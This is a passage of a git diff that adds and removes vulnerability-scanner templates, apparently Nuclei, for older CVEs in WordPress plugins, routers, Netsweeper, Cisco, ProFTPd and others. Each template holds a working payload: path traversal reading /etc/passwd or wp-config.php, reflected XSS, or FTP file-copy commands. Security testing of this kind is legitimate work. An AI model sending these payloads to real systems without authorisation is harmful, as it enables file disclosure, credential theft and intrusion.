"{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2012-0981.yaml b/poc/cve/cve-2012-0981.yaml new file mode 100644 index 0000000000..eef133b20b --- /dev/null +++ b/poc/cve/cve-2012-0981.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-0981 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/18435 + - https://www.cvedetails.com/cve/CVE-2012-0981 + - http://secunia.com/advisories/47802 + - http://www.exploit-db.com/exploits/18435 + classification: + cve-id: CVE-2012-0981 + tags: cve,cve2012,lfi,phpshowtime + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2012-2371.yaml b/poc/cve/cve-2012-2371.yaml new file mode 100644 index 0000000000..27614e05bc --- /dev/null +++ b/poc/cve/cve-2012-2371.yaml @@ -0,0 +1,50 @@ +id: CVE-2012-2371 + +info: + name: WP-FaceThumb 0.1 - Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + remediation: | + Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + - http://www.openwall.com/lists/oss-security/2012/05/15/12 + - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html + - http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79 + - http://www.openwall.com/lists/oss-security/2012/05/16/1 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2012-2371 + cwe-id: CWE-79 + epss-score: 0.00825 + epss-percentile: 0.79974 + cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mnt-tech + product: wp-facethumb + tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin + +http: + - method: GET + path: + - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a0046304402203ed6d753c323a3a6bec82c92c318bf9c494fa3b7b1471e77916b418e8bda843d022073aca0b09ce0b0bd30a909c4f88168507ac148074ad060244f1ada17bb00066e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2012-4273-2198.yaml b/poc/cve/cve-2012-4273-2198.yaml new file mode 100644 index 0000000000..eec897c5e8 --- /dev/null +++ b/poc/cve/cve-2012-4273-2198.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-4273 +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 + - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ + - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html + classification: + cve-id: CVE-2012-4273 + tags: cve,cve2012,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2012-4768-2207.yaml b/poc/cve/cve-2012-4768-2207.yaml new file mode 100644 index 0000000000..7d55437591 --- /dev/null +++ b/poc/cve/cve-2012-4768-2207.yaml @@ -0,0 +1,32 @@ +id: CVE-2012-4768 +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt + - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + classification: + cve-id: CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2013-5528.yaml b/poc/cve/cve-2013-5528.yaml deleted file mode 100644 index 054a82604c..0000000000 --- a/poc/cve/cve-2013-5528.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2013-5528 - -info: - name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 - reference: - - https://www.exploit-db.com/exploits/40887 - - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 - - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ - classification: - cve-id: CVE-2013-5528 - tags: cve,cve2013,lfi,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2013-5979-2280.yaml b/poc/cve/cve-2013-5979-2280.yaml deleted file mode 100644 index 1149dd7311..0000000000 --- a/poc/cve/cve-2013-5979-2280.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2013-5979 -info: - name: Xibo 1.2.2/1.4.1 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/26955 - - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 - - https://www.cvedetails.com/cve/CVE-2013-5979 - - https://bugs.launchpad.net/xibo/+bug/1093967 - classification: - cve-id: CVE-2013-5979 - tags: cve,cve2013,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2013-7240.yaml b/poc/cve/cve-2013-7240.yaml new file mode 100644 index 0000000000..6ad0335e9a --- /dev/null +++ b/poc/cve/cve-2013-7240.yaml @@ -0,0 +1,40 @@ +id: CVE-2013-7240 + +info: + name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + reference: + - https://www.exploit-db.com/exploits/38936 + - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 + - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ + - http://seclists.org/oss-sec/2013/q4/570 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2013-7240 + cwe-id: CWE-22 + tags: cve,cve2013,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + - "DB_HOST" + - "The base configurations of the WordPress" + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2014-2962-2313.yaml b/poc/cve/cve-2014-2962-2313.yaml new file mode 100644 index 0000000000..2456af7a2e --- /dev/null +++ b/poc/cve/cve-2014-2962-2313.yaml @@ -0,0 +1,25 @@ +id: CVE-2014-2962 + +info: + name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal + author: daffainfo + severity: high + description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + reference: https://www.exploit-db.com/exploits/38488 + tags: cve,cve2014,lfi,router,firmware,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2014-4561-2375.yaml b/poc/cve/cve-2014-4561-2375.yaml deleted file mode 100644 index aaffe503df..0000000000 --- a/poc/cve/cve-2014-4561-2375.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2014-4561 -info: - name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. - reference: - - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 - - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2014-4561 - cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss,weather -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '">' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2014-4940.yaml b/poc/cve/cve-2014-4940.yaml deleted file mode 100644 index 13f17a9af9..0000000000 --- a/poc/cve/cve-2014-4940.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2014-4940 - -info: - name: WordPress Plugin Tera Charts - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ - classification: - cve-id: CVE-2014-4940 - tags: cve,cve2014,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2014-9094.yaml b/poc/cve/cve-2014-9094.yaml new file mode 100644 index 0000000000..8363259c7c --- /dev/null +++ b/poc/cve/cve-2014-9094.yaml @@ -0,0 +1,49 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + remediation: | + Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + - http://websecurity.com.ua/7152/ + - http://seclists.org/fulldisclosure/2014/Jul/65 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2014-9094 + cwe-id: CWE-79 + epss-score: 0.32637 + epss-percentile: 0.96584 + cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: digitalzoomstudio + product: video_gallery + framework: wordpress + google-query: inurl:"/wp-content/plugins/dzs-videogallery" + tags: cve2014,wordpress,xss,wp-plugin,seclists,cve + +http: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d75932a72e0aa224c8e98c949a91e0c38f2115c1f11e070b55d822e1089d9219022100f3b8ee644a18bf8300e32cce2c725d40bb3056d4e61f01b5964e15adb11d13d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2014-9606-2430.yaml b/poc/cve/cve-2014-9606-2430.yaml new file mode 100644 index 0000000000..0dbcbe73af --- /dev/null +++ b/poc/cve/cve-2014-9606-2430.yaml @@ -0,0 +1,35 @@ +id: CVE-2014-9606 +info: + name: Netsweeper 4.0.8 - Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-9606 + cwe-id: CWE-79 + tags: cve,cve2014,netsweeper,xss +requests: + - method: GET + path: + - '{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/cve-2014-9609-2437.yaml b/poc/cve/cve-2014-9609-2437.yaml new file mode 100644 index 0000000000..14e19e8e0e --- /dev/null +++ b/poc/cve/cve-2014-9609-2437.yaml @@ -0,0 +1,33 @@ +id: CVE-2014-9609 + +info: + name: Netsweeper 4.0.8 - Directory Traversal + author: daffainfo + severity: medium + description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2014-9609 + cwe-id: CWE-22 + tags: cve,cve2014,netsweeper,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/cve-2015-0554-2456.yaml b/poc/cve/cve-2015-0554-2456.yaml deleted file mode 100644 index af65820b4d..0000000000 --- a/poc/cve/cve-2015-0554-2456.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2015-0554 -info: - name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure - author: daffainfo - severity: high - description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. - reference: - - https://www.exploit-db.com/exploits/35721 - - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - - http://www.exploit-db.com/exploits/35721 - classification: - cve-id: CVE-2015-0554 - tags: cve,cve2015,pirelli,router,disclosure -requests: - - method: GET - path: - - "{{BaseURL}}/wlsecurity.html" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var wpapskkey" - - "var WscDevPin" - - "var sessionkey" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/poc/cve/cve-2015-1880-2477.yaml b/poc/cve/cve-2015-1880-2477.yaml deleted file mode 100644 index 324c752a09..0000000000 --- a/poc/cve/cve-2015-1880-2477.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-1880 -info: - name: XSS in Fortigates SSL VPN login page - author: pikpikcu - severity: medium - description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - http://www.securityfocus.com/bid/74652 - classification: - cve-id: CVE-2015-1880 - tags: cve,cve2015,xss,fortigates,ssl -requests: - - method: GET - path: - - "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header diff --git a/poc/cve/cve-2015-2166.yaml b/poc/cve/cve-2015-2166.yaml deleted file mode 100644 index 143042641b..0000000000 --- a/poc/cve/cve-2015-2166.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2015-2166 - -info: - name: Ericsson Drutt MSDP - Local File Inclusion - author: daffainfo - severity: high - description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. - reference: - - https://www.exploit-db.com/exploits/36619 - - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 - - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html - - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ - classification: - cve-id: CVE-2015-2166 - tags: cve,cve2015,lfi,ericsson - -requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/poc/cve/cve-2015-3306-2502.yaml b/poc/cve/cve-2015-3306-2502.yaml deleted file mode 100644 index 7ac40dbb62..0000000000 --- a/poc/cve/cve-2015-3306-2502.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2015-3306 - -info: - name: ProFTPd RCE - author: pdteam - severity: high - reference: https://github.com/t0kx/exploit-CVE-2015-3306 - description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - classification: - cve-id: CVE-2015-3306 - tags: cve,cve2015,ftp,rce,network,proftpd - -network: - - inputs: - - data: "site cpfr /proc/self/cmdline\r\n" - read: 1024 - - data: "site cpto /tmp/.{{randstr}}\r\n" - read: 1024 - - data: "site cpfr /tmp/.{{randstr}}\r\n" - read: 1024 - - data: "site cpto /var/www/html/{{randstr}}\r\n" - - host: - - "{{Hostname}}" - - "{{Host}}:21" - - read-size: 1024 - matchers: - - type: word - part: raw - words: - - "Copy successful" diff --git a/poc/cve/cve-2015-4050.yaml b/poc/cve/cve-2015-4050.yaml deleted file mode 100644 index a56e9847ee..0000000000 --- a/poc/cve/cve-2015-4050.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2015-4050 - -info: - name: ESI unauthorized access - author: ELSFA7110,meme-lord - severity: high - description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment. - tags: cve,cve2015,symfony,rce - reference: - - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 - -requests: - - method: GET - path: - - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" - - matchers-condition: and - matchers: - - type: word - words: - - "PHP Credits" - part: body - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2015-7780-2604.yaml b/poc/cve/cve-2015-7780-2604.yaml new file mode 100644 index 0000000000..789c902cf2 --- /dev/null +++ b/poc/cve/cve-2015-7780-2604.yaml @@ -0,0 +1,36 @@ +id: CVE-2015-7780 +info: + name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal + author: daffainfo + severity: medium + description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0. + reference: + - https://www.exploit-db.com/exploits/35933 + - https://www.cvedetails.com/cve/CVE-2015-7780/ + - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html + - http://jvn.jp/en/jp/JVN21968837/index.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2015-7780 + cwe-id: CWE-22 + tags: cve,cve2015,lfi,manageengine +requests: + - method: GET + path: + - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + - "java.sun.com" + part: body + condition: and + - type: word + part: header + words: + - "application/xml" diff --git a/poc/cve/cve-2016-1000128-2651.yaml b/poc/cve/cve-2016-1000128-2651.yaml deleted file mode 100644 index 61bfd4d41f..0000000000 --- a/poc/cve/cve-2016-1000128-2651.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2016-1000128 -info: - name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - - https://wordpress.org/plugins/anti-plagiarism - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000128 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000132-2669.yaml b/poc/cve/cve-2016-1000132-2669.yaml deleted file mode 100644 index df36a3068e..0000000000 --- a/poc/cve/cve-2016-1000132-2669.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2016-1000132 - -info: - name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - - https://wordpress.org/plugins/enhanced-tooltipglossary - - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000132 - cwe-id: CWE-79 - metadata: - google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000134-2678.yaml b/poc/cve/cve-2016-1000134-2678.yaml deleted file mode 100644 index d781de2ee0..0000000000 --- a/poc/cve/cve-2016-1000134-2678.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2016-1000134 - -info: - name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000134 - cwe-id: CWE-79 - metadata: - google-query: inurl:"/wp-content/plugins/hdw-tube" - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000143-2717.yaml b/poc/cve/cve-2016-1000143-2717.yaml deleted file mode 100644 index 3b67015203..0000000000 --- a/poc/cve/cve-2016-1000143-2717.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2016-1000143 -info: - name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 - - https://wordpress.org/plugins/photoxhibit - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000143 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000154-2740.yaml b/poc/cve/cve-2016-1000154-2740.yaml new file mode 100644 index 0000000000..224b14f744 --- /dev/null +++ b/poc/cve/cve-2016-1000154-2740.yaml @@ -0,0 +1,34 @@ 